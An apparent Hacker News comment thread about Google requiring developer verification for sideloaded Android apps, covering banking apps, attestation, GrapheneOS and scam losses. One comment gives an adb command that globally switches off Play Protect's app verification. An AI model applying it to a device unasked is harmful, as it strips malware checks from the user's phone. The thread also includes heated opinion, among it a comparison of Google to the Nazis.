How, exactly? How does Google benefit from random 3p apps having Internet access? And remember, Google has play services on every device to proxy anything it needs/wants.
Huh? Not sure how this qualifies as "whack ass". There's an internet permission built in to the OS that Google chose to not expose to the user. The parent poster was claiming there is no reason anyone would want that permission, I then pointed out a whole category of apps that don't need internet to function for anything besides ads and telemetry. All of this is factual info.
So rather than just dismissing the argument via insulting language, can you provide a reasonable alternative explanation for why this setting isn't exposed to the user?
The internet permission is exposed to the user, it just can't be revoked by the user. But that's true of like 100 other permissions, too. It's the default case that permissions are not revokable.
And I did provide 2 reasons why that's the case for Internet specifically, neither of which were even attempted to be refuted in this comment chain
I would really like to deny internet access for apps like mx player. The frequency of ads on that app once Times group bought is the worst I've seen in my entire life. One of the best video players on Android, ruined.
Some chinese skins do offer the ability to revoke internet access for apps. I wonder why the western ones don't?
The worst part is the Orwellian opening sentence they start with in their blog post [0]:
> You shouldn’t have to choose between open and secure
2+2=5
Truly the end of an era. I've spent nearly two decades buying Android phones because of a single checkbox in settings that let me have the freedom I consider essential to any computing device that I own.
In a way, it's liberating, I've missed out on a lot from the Apple ecosystem because of that checkbox. Maybe finally I can let go of it now the choice is out of my hands.
Very much my exact feelings. I had the first Android phone ever and even wrote my own APKs and enjoyed the freedom of the mobile platform that let me install my own software. But it's been close to 20 years and maybe it's time to check out the other side, as much as I despise Apple's locked down ecosystem.
I'd sooner get a Chinese phone that isn't "Google-certified" than reward this behaviour by giving $1000+ to the DRM OGs at Cupertino. Neither Apple nor Google are protecting users against the alleged data-stealing evils of Tiktok, so how exactly are they providing any kind of "user safety" by throwing up fees and red tape for small independent developers?
Just a note for readers that the Jolla C2 cellular modem only supports European bands, so if you're in the US you're out of luck on that front until they release a new model.
I used it as my first phone some 10 years. I type this message on one. I like their perseverance, but the truth is it's declining in practical usability.
Edit: In EU, so (lack of) bands are not an issue for me.
Yes, I was checking this out! Sailfish with Android compat seems very compelling. The videos I saw on youtube showed a bit less polish than I'd prefer, but I'd be OK with that. But then I read up on the manufacturer they partnered with. Reeder, I believe? I ended up looking up some other devices they made and there seems to be build quality problems...I haven't seen reports like this for the Jolla C2, though, so I still might be tempted to purchase one just to see how it drives. Thanks for the recommendation!
For what conceivable reason would they make the users go on desktop, considering mobile is in the process of being fully locked down?
If anything, they'd eventually deny access from desktop, forcing everyone to login via the fully manages mobile devices without any user freedom.
Some banks are already getting there btw, as their preferred 2fa is a companion app... One small step away from making that the only option, effectively denying access to anyone without a locked down mobile device.
It's already that way in my country. The few banks that still have the web version only support it for their business clients, and it's only something like two or three banks. If you're a regular client, there's not a single bank left that you can still use without a smartphone (unless you're ready to visit a branch for every little thing — so pretty much daily).
My bank’s app doesn’t even work or even install on my phone because the bank considers my phone too old. So if they suddenly required the app to log in, I simply wouldn’t be able to bank with them. So they would lose my checking, investment, and HSA business when I move to another bank.
I think they worded that poorly, but didn't mean what you got from it: the point I'd take isn't that they will require you to have a desktop, but that even desktop will also have the same restrictions, so it isn't just a mobile problem.
What gp is saying is that to access banking form desktop will require an approved OS and attestation just like on mobile.
The current state of affairs is that an approved OS and attestation are only required on mobile but not on desktop
Actually my bank already requires me to use the phone app for any operation on the website. When I want to login from my laptop I need to use my phone with their app to approve the login, same for almost any operation.
Ah, and it can only be installed in one device at the same time :D Don't have your phone available? Bad luck for you
> can only be installed in one device at the same time
I neither like nor understand this restriction. It makes device failure / loss / theft a much more difficult experience to recover from than it would otherwise be. The device should be throwaway. I specifically keep old phones in case something happens to the new one.
WhatsApp is probably the stupidest example of only being able to be on a single device (but I'm forced to use WhatsApp for one specific purpose, so I already resent it). Signal does the same thing, so maybe it's related to the E2EE that WhatsApp licensed from Signal...
I use the Signal fork Molly to get messages on multiple phones. One remains the primary and the others linked, but I get messages even if the primary is off.
I have a huge problem with companies using their own apps for 2FA.
Google started doing this for Gmail. To use Gmail on my laptop, I need to approve it with Gmail on my phone. I never signed up for this. I’m now afraid if I delete the Gmail app from my phone that I’ll lose access to my email.
I hate the direction “security” is taking us. It’s done in the name of security, but it feels more like blackmail to get and keep the company app on your phone.
Is that a thing Google logins can be set to require? I _can_ use the Gmail app on a device for 2FA, I can also press "try another method" and use any 2FA app.
i do like how many apps are starting to play nice with 3rd party authenticators. i use ms authenticator for a bunch of things. Although knowing MS it has some massive license fee for them to support.
De facto, this is already the case - you can use your computer as a display but to actually authorize a login or transaction you need your phone with said attestation.
True for PayPal though. I just recently had to jump through seven different hoops to verify my ID (with creepy, creepy face scans) and they absolutely refused to even start the process on desktop. Eventually got the stupid thing to work on my iPad; Android+Firefox was a no go, and it's stock Pixel 5a with Google OS.
Thankfully I don't actually rely on PayPal for anything serious, but there are artists whose commission I like to pay, and being able to actually pay them would be nice. :/
For logins, at least, they support passkeys on the desktop as well, so long as the browser does it. Which basically means Win11 or macOS, either some Blink-based browser or Safari.
I'll just have to disable it and choose a banking app that works on the browser. Tonnes of my apps are sideloaded. Quite a few are on the playstore or the dev might upload their details.
I never really got into "phone" progrmaming, always waiting for the shenanigans to die down. But somehow the shanigans have gotten worse and for a significant chunk of the world population, the phone is the only computation device they have at all.
I never got into it because I was convinced developers would refuse to give up control over distribution when Apple started doing it. I wish I was right, but here we are.
Developers sometimes seem to be as in control as farmers are of the distribution of their produce. There's no absolute rule that gives the owners of large scale distribution networks power over both producer and consumer. It's just laws of convenience. It's easier for everyone to go through a few or just a single common broker.
There's no law against a more democratic way to implement the broker either but it requires interesting methods of coordination and/or decision making that doesn't seem to exist yet?
It limits choice. I don’t have any experience building mobile apps because I didn’t want to buy into an unfair ecosystem. That means fewer mobile apps even if distribution networks change tomorrow.
> I don’t have any experience building mobile apps because I didn’t want to buy into an unfair ecosystem
Seems like it wouldn't be much of a stretch to compare that statement to not starting a business because the economy is unfair. People indeed don't start businesses when the bureaucratic or tax overhead outweighs the financial benefit, but nobody loses sleep over an individual's hypothetical missed opportunity to learn a new skill but them. Doesn't matter to the platform owners unless it also stops being profitable, so it's their job to maintain the profitability for their ecosystem despite whatever barriers they put up.
> There's no law against a more democratic way to implement the broker either but it requires interesting methods of coordination and/or decision making that doesn't seem to exist yet?
It's not enough to not have a law against it, we need to have and enforce laws requiring it.
Some developers did. Others, who didn't care so much, got into the app store instead, and got rich off it. Users didn't care about such principles and mobile-first has been a viable strategy for a long time now. Not having something of an app is a problem if you want to stay in many markets.
Developers want a stable, secure platform where they can reach customers that trust the platform and are willing to transact. Everything is downstream of that, including any philosophy around control.
Developers are businesses and the economics need to work. For that, safety and security is much more important than openness.
Oh! Classic Survivorship bias. You're only looking at the devs who went into business in the phone ecosystem in the first place. I'm thinking that they're there despite the barriers to entry ('shenanigans'), and the ones you encounter happen to be those who happen to place a higher value on 'other values'. As the ecosystem gets locked down more, this effect becomes stronger.
Meanwhile, you're not looking at those who left, or those who decided to never enter a broken market dominated by players convicted of monopolistic practices.
This seems much more intuitive than a hypothesis where somehow people would prefer to enter a closed market over a fair and open market with no barriers to entry.
Remember, monopolists succeed because they are distorting the market, not because they are in fact the most efficient competitor.
You now need to have an online account to setup and login on a Windows desktop. It's obvious what the trend is and it's not allowing consumers control over their stuff.
Just look up how to skip the "OOTB (out of the box) experience" and you can still bypass having to set up a cloud account on Windows 11 and can just set up a local account like normal. :)
I have been a computer user, developer and a system administrator for longer than I care to recount. I don't like Windows and I don't use it at work or home. But I do encounter it from time to time, and the experience is worse each time. The last time it happened, I couldn't figure out the way to skip/bypass the cloud account set up. Would it have been possible if I tried harder, starting with a web search? Perhaps. But there is no way an average system user is going to have the patience or often the skill necessary to do it. I'm not challenging their intelligence. But people have other priorities than to jump through a dozen hoops just to preserve privacy. I would do the same if I had to set up a Windows system for urgent work.
These sorts of hurdles exist to push more and more users to their favorite workflow until the dissenting voice is too feeble to notice when they finally pull the plug on the straightforward method. The intent is certainly there, since they are quite evidently boiling the frog. Just wait for the fine day when you wake up in the morning to see an HN story just like this one about Windows login as well.
The Nazis were initially quite squeamish about taking the lives of innocent civilians. It was in 1939 that a Nazi supporter wrote to Hitler requesting permission to euthanize his severely disabled infant son [1], who he described as 'a monster'. Hitler send his personal physician Karl Brandt to Leipzig to assess the situation. Upon confirmation, Hitler personally authorized Brandt to arrange the euthanasia, with the promise to protect him legally. Don't forget that these were the Nazis, the original.
Once that happened, they gradually tried the idea with other disabled children, eventually progressing to deceiving the parents to get the permission. Then it got extended to teenagers and eventually adults, including disabled war veterans. Then there was a backlash and it stopped for a while. But it reappeared eventually, this time on an industrialized scale - the final solution. Disabilities were not the limit anymore. Arguably the worst genocide in human history started with the reluctant murder of a 5 month old infant, just 6 years before reaching its peak at the end of the war.
This is the classic example of a slippery slope. One hesitant misstep is the beginning. But as they realize its benefits (to them), they double down and gradually expand the scope until nothing is exempted. The consumer electronics industry and the software industry are certainly no exceptions to this. Is it too dramatic and hyperbolic to compare them to the Nazis? Admittedly, a bit. But perhaps it's not a bad idea to shame them like that, because clearly nothing else is working (with all due respects to the victims of the original). And it's not like they hesitate to shame us when it suits them.
Personally: the idea that a "slippery slope" is a logical fallacy has always seemed like bulllshit to me. The vast majority of reasoning for why the judiciary makes the decisions it does is because of "precedent". Slippery slope is how the world operates. It surfaces everywhere, and when the slope we're sliding down matters, like this one, we have to fight back with fervor. Google isn't doing this in a vacuum; they're doing this because there's precedent for it, and because all they want is to assert more power over the world.
Google's behavior is utterly and entirely disgusting, unacceptable, despicable, and dishonorable. Everyone who even glances near this decision should feel overwhelming shame. If you have a shred of political power to fight this internally, you are a failure to yourself, your customers, and the world if you choose to stay silent. They'll read comments like these and think "we're right, we're being brave", because they have convinced themselves that there is bravery in wielding overwhelming power against their users.
> Personally: the idea that a "slippery slope" is a logical fallacy has always seemed like bulllshit to me.
I don't know if I got this wrong, but the 'slippery slope' argument by itself never appeared to be a logical fallacy to me. There are numerous valid examples of it, and that's the context of its use in my previous reply. There certainly is a 'slippery slope' logical fallacy, but I thought it meant that you are misapplying/misusing the slippery slope argument where it isn't valid or doesn't apply.
> Google's behavior is utterly and entirely disgusting, unacceptable, despicable, and dishonorable.
I was going to apply the Nazi label on them everyone else who use such sleazy tactics. I hesitated because a lot of people are still emotional about the holocaust (it has been 80 years) and object to equating anything with Nazism. But I sometimes wonder if the objection is meant only to silence the critics. While their actions haven't yet reached the magnitude of atrocities committed by the Nazis, their actions certainly are consistent with the Nazi tactics. Besides, it's not as if they had any qualms labeling ordinary people 'Pirates' for sharing media. Therefore I feel it's quite appropriate to apply to them and promote the label of 'Supply Side Nazis'.
i made and released some apps in the early days. Got tired of it and got tired of the reminders from google to add banners, screenshots, submitting icons to support multiple resolutions.. notifications that apps i haven't touched in decade are no longer compatible etc.
so much extra work involved that isn't building the app.
Got tired of this with a few extensions I made too. It felt like every year or so they'd completely break some API and I'd have to go switch to the new one, then they wanted a privacy policy, then justification for permissions, etc etc. Wasn't worth the trouble eventually and I just let them die.
Even aside from the privacy implications (which aren't trivial themselves,)
Doesn't this make it prohibitively difficult to do local builds of open source projects? It's been a long time since I've done this, but my recollection was that the process to do this was essentially you would build someone else's (the project's) package/namespace up through signing, but sign it locally with your own dev keys. A glance at the docs they've shared makes it sound like the package name essentially gets bound to an identity and you then can't sign it with another key. Am a I misremembering and/or has something changed in this process? Am I missing something?
Not just difficult - it becomes impossible. You can no longer develop any android app without Google's approval, just like iOS. The official emulators might not even work.
A repo is just files in a directory, so the namespace can be changed, but the whole thing stinks. Having to setup Android signing keys and needing to provide ID is not fun.
It means you won't easily be able to run builds on Google certified Android devices that aren't from "approved" people.
That's where the "prohibitively difficult" part comes in... surely they don't expect every developer on every open source app in the world to have their own app registration/package name for the same app, do they? Feels like an N * M problem, if so.
They have the ecosystem by the balls. Phone manufacturers in recent years have been making unlocking & modifying their devices more and more difficult, google and app developers have been cracking down harder on modded devices by implementing TPM equivalents in the hardware to sign and verify that your system is a google-appproved one, and alternatives still are decades behind in terms of app ecosystem.
> and alternatives still are decades behind in terms of app ecosystem.
That's if they're available at all. In my country, only cell phones certified by the telecommunications government agency (ANATEL) can be imported, so the alternatives (Jolla, PinePhone, Fairphone) simply don't exist.
It's incredibly obnoxious when people type "in my country" as if we're all supposed to just... know where they live. It's also incredibly common. Why do people do this?
Asking where somebody's from and having them respond with the state is not unreasonable -- you can already tell they’re American from the accent. The US is huge, about half of its states have more land area than half of the countries in the world. Asking where someone is from and receiving "the US" in response is about as informative as someone from Europe replying "Europe". Like yeah, obviously, I could tell by your accent, but where in Europe?
Funny thing is that americans do that all the time, even in international settings like a coworking space full of expats. Everybody introducing themselves with a "hi, I'm from this country", except americans telling their state or city. Are they expecting us to be familiar with their geography, or just unaware of alternative geographical frames of reference?
I'd think passive recognition of a fair few states would be a pretty low bar for relatively educated, English-speaking people. It's a pretty low bar, just placing a region with its country. People also regularly just assume that level of knowledge for globally- or culturally-relevant cities.
Maybe I think too highly of people, but I'd also imagine most would be able to get say... 6/10 right, for which countries the following list is from:
Yeah, I'll just ditch Google over this. The only reason I put up with their crap is because I can actually just install software on my phone. If they take that away, there's no motivation to stay.
If I can't run F-Droid and termux and all that, I have no need for Android supposed freedom. I'll just use an iPhone (it would be the first time!), minimize my use of mobile platforms to the maximum extent I can and stick with Linux laptops.
I'm currently researching Android alternatives, including Librem and Jolla C2, and I'm skeptical that those will be compelling. It's just so sad.
I’ve been daily driving a Librem 5 for two years. It’s not compelling, but I’m surprised at how little all those tiny inconveniences matter in the long run.
I think we tend to underestimate our ability to get used to stuff.
If both phone OS's are going to be the exact same on user choice then you might as well compare the two on their merits and this is not a comparison Android wins.
I rely on fdroid and am not sure what I'll do with this pixel 6a. I sometimes root, sometimes don't but I may have to get on the lineageos program full time. And I'm hoping for a rumored last batch of pinephone pro phones to be available later this month although I have no illusions about it being a real daily driver.
fdroid is based in the EU and the Cyber Resilience Act was already going to force them to either make their filters more strict (absolutely prohibit anything with any sort of "monetization"), or start collecting this data.
If they have anything on the platform that is subject to the CRA, they are a distributer:
Use an iPhone, minimize my use of it. Continue to emphasize Linux on all my other devices. Move away from Google and Apple services to as much self-hosting as possible. Leverage TailScale to make my services accessible, globally, without actually exposing them on the internet. I'm just assuming that I will have to have some kind of attested device in order to run banking and payment apps and that might as well be a locked down device like an iPhone.
An unofficial build of Android, like Grapheneos. It likely won't be able to install apps from the Play Store, but at that point it might be a blessing.
I would say this is a bold choice for a company whose existing restrictions around third party apps and stores and in-app purchases has already been found illegal. While it doesn't look like they're pushing for it right now, forcing Google to sell Android was something the DOJ has considered as a penalty.
I'm not sure Google still has the ecosystem by the balls. It's very possible whatever Googlers who made this decision are the type of folks who don't comprehend they work for a monopoly that like actually can't do things like this anymore.
They're also the best equipped to tell if you've done so, and restrict access from critical functionality needed by many in their day-to-day lives if you've done so.
The intentions behind all the security hardware they introduced in pixel phones first, and is now required by play integrity to function might've been well-meaning, but that doesn't really matter in the end. Security features that the user can't control and bypass aren't security features - they're digital handcuffs.
true, and recently they deserved a lot of credit for publicly releasing their device trees and drivers. unfortunately, with the 10 series pixels they no longer will be releasing device trees, which makes it much more difficult to maintain custom ROMs
The reason I chose the Android ecosystem over the Apple ecosystem, once I found out that the Maemo/Meego ecosystem was a dead end and the Openmoko ecosystem was a non-starter, is that the Android ecosystem allowed me to develop and install my own apps on my own devices whenever I wanted to, without arbitrary limitations like having to periodically plug the phone into my computer to renew some authorization. Additionally, there was even for some devices the possibility of rebuilding the whole operating system with any changes I desired.
If I'm not allowed to develop and install my own apps on my own phone, what advantage does Android have over Apple?
> without arbitrary limitations like having to periodically plug the phone into my computer to renew some authorization
I find it easier to do a git commit once every 89 days and see my app auto refreshed through Testflight for me and anyone else I care to let use it.
If you look at the build system SaaS pricing or even IDE pricing on Show HNs here, the Xcode cloud build and distribution ecosystem is an absolute steal at $9 a month. Private Testflight (with no review) can be more convenient than that desktop cable.
If this is enforced via Play Protect, then the whole mechanism can likely be disabled with:
adb shell settings put global package_verifier_user_consent -1
This does not require root access and prevents Android from invoking Play Protect in the first place. (This is what AOSP's own test suite does, along with other test suites in eg. Unreal Engine, etc.)
I personally won't be doing this verification for my open-source apps. I have no interest in any kind of business relationship with anyone just to publish an .apk. If that limits those who can install it to people who disable Play Protect globally, then oh well.
I really hope this ends up being possible! Play Protect seems to jump up every so often and try to scare me into turning it on. Very annoying. I've wanted to disable Play Protect permanently, but never did the query to learn how, so thank you.
There could of course be side effects in the future when this restriction is rolled out, as in your device's Play Integrity status could be affected and your banking app/phone wallet might not let you perform app-based payments from that device.
Makes sense why they had to get rid of the "don't be evil" motto. They've been on a roll.
I've seen a lot of similar sentiment on this thread, but the reason I use Android is because it gives me more control than iOS by allowing full-on painless sideloading, and custom distributions like GrapheneOS. They're doing everything they can to turn themselves into a worse Apple. All of the downsides of Apple, but none of the upsides. Apple beats them in every aspect that isn't "openness".
When will the straw break the camel's back? I'm shocked we've let it get to this point with no realistic alternatives. There's no reason a competitive Linux-based smartphone can't exist (no, I'm not counting Android in that).
> There's no reason a competitive Linux-based smartphone can't exist (no, I'm not counting Android in that).
Yes there is. You all don't understand that they will use remote attestation to force everyone to use approved devices with signed apps on signed OSes only
You won't be able to bank, call a cab, write a chat message, watch a youtube video or do anything relevant on a device anymore that isn't signed, approved and controlled by google. They've made us cattle and now they are going to milk us dry.
> There's no reason a competitive Linux-based smartphone can't exist
There is; it's the "phone" part of "smartphone". Being a phone makes the device subject to a lot more requirements (for an obvious example, emergency dialing must always be available and work, and at the same time the phone must never accidentally dial the emergency number).
In my country, only cell phones certified by the government telecommunications agency (Anatel) can be imported, so I can't for instance go to the Jolla or PinePhone store and buy a Linux-based smartphone; if I tried, it would be sent back the moment the package entered the country. (See https://www.gov.br/anatel/pt-br/regulado/certificacao-de-pro... for details.)
> There is; it's the "phone" part of "smartphone". Being a phone makes the device subject to a lot more requirements (for an obvious example, emergency dialing must always be available and work, and at the same time the phone must never accidentally dial the emergency number).
Funnily, Google is one the few phone manufacturers who can’t make emergency calls to work. (e.g. search Pixel problems)
Thank you, all HNers at Google, for continuing to work there.
And yes, before you ask, I have personally quit a job that paid 3x what I was able to get elsewhere over ethics. And no, I'm not rich, probably bottom 5% in terms of assets among my colleagues, coming from a lower-class background.
Oh, yes... Actually I remember: it was a long slow series of accepting small artificial restrictions. I remember people laughing at me at the time. They said it won't matter, they didn't care, that I was paranoid...
Unless this is used to block TikTok or ChatGPT users still won’t care and people will still laugh at us for caring, or think wanting privacy or control of your computers is suspicious or ungood.
and don't forget all the people with the dismissive remarks about how it didn't affect them on their Graphene or Calyx phones. We're all downstream of something. The real product of Android for us was always the interoperability with the normal world for the tinkerer.
We had no part in this. The blame lies squarely with Google and its employees, who trade away user freedom for profit and career gain. Many who are smart enough to know better but instead compromise their principles. It's just another symptom of late-stage capitalism.
If your businesses idea doesn't work without you being evil, you deserve to go bankrupt. I perceive a tendency to assume it is necessary for a company like Google to maintain full control over our ecosystem to further our progress and maintain order. However, we should know by now that this isn't the case. You don't have to be evil to be useful. See GNOME, GrapheneOS, Steam, KDE, Wikipedia, Linux or Mozilla (previously). Tricking us of their inevitability is their greatest success.
Sep.2026: "The requirement goes into effect in Brazil, Indonesia, Singapore, and Thailand. At this point, any app installed on a certified device in these regions must be registered by a verified developer."
Any hint why those countries first?
Is it a local law there driving this whole move? Is a critical mass of malware originating from there?
So what's the solution? What's the reaction of semiofficial Android forks? Should we switch to Huawei now? Should we then have two phones? One with Android fork and one with some other "official" OS?
Their own store has a dozen "AI Photo Editor Pro 2026" and "Turbo Deluxe Ultra VPN Secure Pro" apps that are "approved" and yet for sure have malware at worst and at best steals your data and serves nonstop pop up ads
Don't get me started. Every single app I search for on the play store gets a first sponsored result that is a completely different app. It is so utterly broken by design.
> Google notes “supportive initial feedback” from government authorities and other parties:
Ah, then I guess everything is fine. I'm sure they aren't in favour because it gives governments greater control over what apps we're allowed to have on our phones. That would be absurd.
I feel like that makes the most sense. That this isn't something Google thought up but something that the EU wanted to ensure its government ID app was "safe". Google does benefit but the timing seems to line up.
It makes total sense to the average person. There has been a constant stream of “yet another Android user got scammed out of their life savings because of Android side loading; iPhone users not affected”
It’s an inconvenient fact for power users, but side loading makes users significantly more vulnerable to scams and restricting side loading is both a predictable and reasonable response to that fact.
If you don’t like this, you need a better argument than “my desire to run any app I want is more important than pensioners losing their life savings” because that is not a winning argument with the average person, with governments, or with Google/Apple.
> As I’ve mentioned here before, sideloading is a genuine security concern, not merely an excuse for Apple to exert control. There is a never-ending stream of people losing their life savings. It happens on Android and not iOS because Android allows sideloading and iOS doesn’t. There is a very real human cost to this.
> Police warn new Android malware scam can factory reset phones; over S$10 million lost in first half of 2023
> There have been more than 750 cases of victims downloading the malware into their phones in the first half of 2023, with losses of at least S$10 million (US$7.3 million).
> 74-year-old man loses $70k after downloading third-party app to buy Peking duck
> “I couldn’t believe the news. I thought: Why am I so stupid? I was so angry at myself for being cheated of my life savings. My family is frustrated and I ended up quarrelling with my wife,” said Mr Loh, who has three children.
> Singapore Android users to be blocked from installing certain unverified apps as part of anti-scam trial
> "Based on our analysis of major fraud malware families that exploit these sensitive runtime permissions, we found that over 95 per cent of installations came from internet-sideloading sources," it added.
> Android users in Singapore tried to install unverified apps nearly 900,000 times in past 6 months
> These attempts were blocked by a security feature rolled out by Google six months ago as part of a trial to better protect users against malware scams, which led to at least S$34.1 million (US$25.8 million) in losses last year with about 1,900 cases reported.
When governments across the globe are becoming more authoritarian, we need to protect our ability to run whatever app we want. Otherwise they'll ban communication apps when we step out of line and protest, as we've seen in places like Hong Kong on more locked down platforms like iOS. This isn't about power users. It doesn't matter how many links you post. The US is literally turning into an authoritarian dictatorship before our eyes. Germany's AfD now commands 25% of the vote and it keeps increasing. Far right parties are gaining ground everywhere.
We can't be handwringing about safety right now, because our right to free speech and to protest are at stake. Our democracies are at stake here.
All of those links 404s for me. Can you explain how the malware works? You are aware that it's not the app store that protects you, but the sandboxing? Are these impersonation vectors, ie phishing?
I didn’t notice that Hacker News had truncated the URLs for display. You can get to the articles by following the links in the original comment.
> You are aware that it's not the app store that protects you, but the sandboxing?
Both protect you.
> Are these impersonation vectors, ie phishing?
It’s a variety of things. Some use accessibility hooks to act as key loggers. Some seem to use exploits. Some are phishing by impersonating other apps.
I know the situation in Singapore and Thailand and I was curious if there would be anyone mentioning it in this discussion. Thank you for your comment, you should be upvoted.
I think this might backfire in that it might be enough to prompt technical people to seriously start looking for alternatives.
I personally will be extremely unhappy if I no longer can run dns66, newspipe or Firefox with ad blocking on my phone.
I think I might also start spending less time on my phone, which would be a good thing for me and a terrible thing for Google (in aggregate of course).
I've grown increasingly hateful towards both my Android and iOS devices over the last decade. The platforms themselves are increasingly user-hostile, and their appstores are crammed full of shitty, privacy-invading, telemetry-hoovering, dopamine-triggering, ad-filled, lipstick-covered apps that are often garbage compared to the pioneering days of mobile. I miss the days of my old Palm Pilot.
Is anyone working on fixing this? We can do so much better.
Side note, I read that GrapheneOS project is having some challenges recently.. between [0]the Android kernel drivers no longer having their Git history of changes being released (only a code dump with no history) - and [1]one of Graphene's two core contributors being detained/conscripted into a war.
If an alternative, privacy-focused OS like Graphene can support contactless payments (universal, like Google Wallet does it, not having to install an app per bank or card), and can 100% reliably get around apps requiring SafetyNet (or whatever they call it now) attestation, then I'd start using it.
I'd also need an alternate, safe source for common apps like Uber, Lyft, Slack, Kindle, Doordash, my banking/credit card apps, and a host of others that I use regularly. (And, no, "just use their website" is not acceptable; their website experiences are mostly crap.)
Way long ago I used to run CyanogenMod on my Android phones, and it was trivially easy to get every single app I needed working. Now it's a huge slog to get everything working on a non-Google-blessed OS, and I expect some things I use regularly just won't work. I hate hate hate this state of affairs. It makes me feel like I don't actually own my phone. But I've gotten so used to using these apps and features that it would reduce my quality of life (I know that sounds dramatic, but I'm lacking a better way to put it) to do without.
For those watching this stuff, there are two other promising paths using ZK-proofs which might disarm the tradeoff situation we've been stuck in. Banking apps etc aren't willing to eat the liability of devices that are rooted or running alternate OSes, and Google's been banking on the exclusivity that brings from being both hardware and security provider.
Path 1: a ZK-proof attestation certificate marketplace implemented by GrapheneOS (or similar) to prove safety in a privacy-securing way enough for 3rd party liability insurance markets to buy in. Banks etc can be indifferent, and wouldn't ignore the market if it got big enough. This would mean we could root any device with aggressive hacking and then apologize for it with ZK-proof certs that prove it's still in good hands - and banking apps don't need to care. No need for hard chains of custody like the Google security model.
Path 2: Don't even worry too hard about 3rd party devices or full OSes, we just need to make the option viable enough to shame Google into adopting the same ZK certificate schemes defensively. If they're reading all user data through ZK-proof certs instead of just downloading EVERYTHING then they're significantly neutered as a Big Brother force and for once we're able to actually trust them. They'd still have app marketplace centrality, but if and when phones are being subdivided with ZK-proof security it would make 3rd party monitoring of the dynamics of how those decisions get made very public (we'd see the same things google sees), so we could similarly shame them via alternatives into adopting reasonable default behaviors. Similar to Linux/Windows - Windows woulda been a lot more evil without the alternative next door.
All of my bank apps work fine on graphene. I'd switch banks if their app stopped working, not stop using graphene. I stopped using Google wallet, I don't miss it enough to justify using stock android. For other apps, I just put them in a separate profile that has good play installed/configured. It really wasn't bad. The worst part is wiping your phone to install graphene the first time, I prefer just to get a new device for it so I can move stuff over
"Many other devices are supported by GrapheneOS at a source level, and it can be built for them without modifications to the existing GrapheneOS source tree."
How do you access banking and other sensitive apps? If the answer is, you don't, well, you can see how that's a non starter for the vast majority of people.
This is a good start! I think we need something like a ProtonDB for this sort of thing, but that covers all apps, not just banking apps.
I do see five banking apps I use listed there as working, which is great. But -- and maybe I'm being unnecessarily overly worried about this -- what about the future? What if I've been using Graphene for a year or two, and one of the ones that's critical for me changes how they operate, and Graphene no longer passes muster as a platform it will run on. I'm not afraid of this happening at all running Google's stock OS image, but once I do my own thing, I get to keep the pieces when it breaks.
I love how so many of the responses in this thread are "it works for my particular bank" or "my bank's website is good enough" or "I'd only need it to deposit checks, but I never need to do that"... as if those are actually helpful responses to this general problem.
Many many people have banking apps that will not work on non-Google-blessed devices, use banks that have mobile websites that are terrible, and need to do mobile check deposits (which is usually only available in the app, and not the mobile website, if the bank even has one). And no, we're not going to "change our bank".
The reality is that there are so many things that break, sometimes in subtle ways, when you try to use an alternative Android OS. Some people may not have any problems, and that's great! But many -- I would dare to say most -- will.
And there's also a ton of uncertainty: I don't really want to wipe my phone, install GrapheneOS, spend hours messing with it and setting it up, only to find that something critical doesn't work, and now I have to flash back to the stock OS, and hope I can restore everything the way it was.
There's bound to be tradeoffs between scrappy open source communities and trillion dollar industry behemoths. The fact that it's this close of a call is pretty amazing. And really you can blame your bank for not making a usable mobile site. A lot of businesses like to force users into apps because it helps with engagement metrics, not because there's any functional benefit.
This is quickly disappearing as an option as well. I need my bank app to authenticate even when using a web browser on desktop. Luckily my banks app still works on GrapheneOS, but I suspect it's only a matter of time before they disable that because of "security" reasons.
What bank is this? No bank I know /requires/ you to use a mobile app for anything; the web is enough. 2FA can usually be done via email, SMS, or a google-authenticator-compatible app.
They have a nice web app, but you must use their mobile app to login on the web version. The app takes a video of a QR code on the web page during login. Web login completes as soon as the mobile app notifies the server. There's no 2FA code to enter, and no alternative.
I asked them about this, by phone call, when my phone screen broke and I urgently needed to make a transaction. Surely there as an alternative? Or could I do the transaction by phone call?
They told me that indeed there is no other option. Despite having phone customer support, they had no phone or web banking service at all which could be used without a registered mobile device. The only phone service they could perform was to register a new mobile device, which I didn't have. I had a tablet, but it was too old.
So I had no good choice. The Android phone I'm using right now was bought in a hurry just so I could be allowed to make a bank transaction.
It wasn't my first choice of phone. I didn't have time to investigate alternative devices, let alone weigh up open alternatives. I ended up buying a mid-range device under pressure that seemed ok and was available in a store without waiting. (It was a brand new Samsung, and despite the IP rating it got water damaged and stopped working entirely after a few splashes a year or so later, but I was able to get it repaired.)
I should say that I'm not from the US, so that might be why you haven't heard of it.
There is also an alternative for now, but nothing as simple as SMS or authenticator app. They give you a special credit card shaped card with a card reader that you can use to authenticate with using your PIN, which is mostly considered legacy now with the bank app. It's also not realistic to be carrying this thing around everywhere either as it's bigger than my phone.
There is also a national ID app that is used everywhere that I'm worried will stop working on GrapheneOS... Because without it I won't even be able to access online government services like healthcare, taxes, etc.
I don't know the bank they are referring to, but I can cite an example for me: RBC Royal Bank of Canada requires the mobile app. There is nothing you can do on their website without first 2FA via their specific mobile app, and even then only in limited transaction sizes. If you want "full access" (e.g. up to $10k daily transfer via e-transfer) then you MUST use biometrics and the mobile app.
Unfortunately I have checks to deposit every couple months. And my bank has no physical presence, so the only way I can do it is through the mobile app. (They also accept deposits by mail, but I'm a little wary of that; a lost check would be a huge hassle.)
They don't all work, though: too many crank up the settings on google's various 'integrity' checks and will fail on anything that isn't 100% google-blessed. (Which is insane, because that's all that's required: on a previous phone of mine, it worked fine with a stock ROM with a bluetooth-based RCE, but upgrading to a custom ROM would have meant it was 'insecure')
Is that a jab at grapheneOS ? Because thats just another thing that google is borking up. And a little bit more so the banks themselves.
GrapheneOS is the way that all phone operating systems SHOULD be made. Layers and segregation between your banking apps and all the privacy breaking trash and malware you can get off the app store.
It is the banks and google making weird rootkit shit to try and lock down things that is the problem here.
My credit union app already wants 24x7 GPS tracking of my location and full access to my camera at all times and full access to my collection of photos, so the app is already dead to me anyway. Demanding that I use it on a locked down device isn't going to change anything for me, I'm already actively not using it. I use the website on a desktop, I rarely need to access my CU at all much less access it remotely.
Given the large amount of battery and bandwidth already used to track my every move, I wish there was something like "Docker for phones" where I could enable and disable 24x7 full access to my every action IRL.
How is GrapheneOS / SeedVault looking these days in terms of being able to capture reliable backups and restore them to another device (without using the cloud)?
I gather the introduction of the android:allowBackup="false" manifest flag complicated things somewhat... I thought I read since then that a Device-to-Device (D2D) impersonation mode was implemented, and would love to hear if that helped?
The crazy thing is this is all under the pretense of preventing malware. And I constantly hear this argument that the app stores protect people, even from developers.
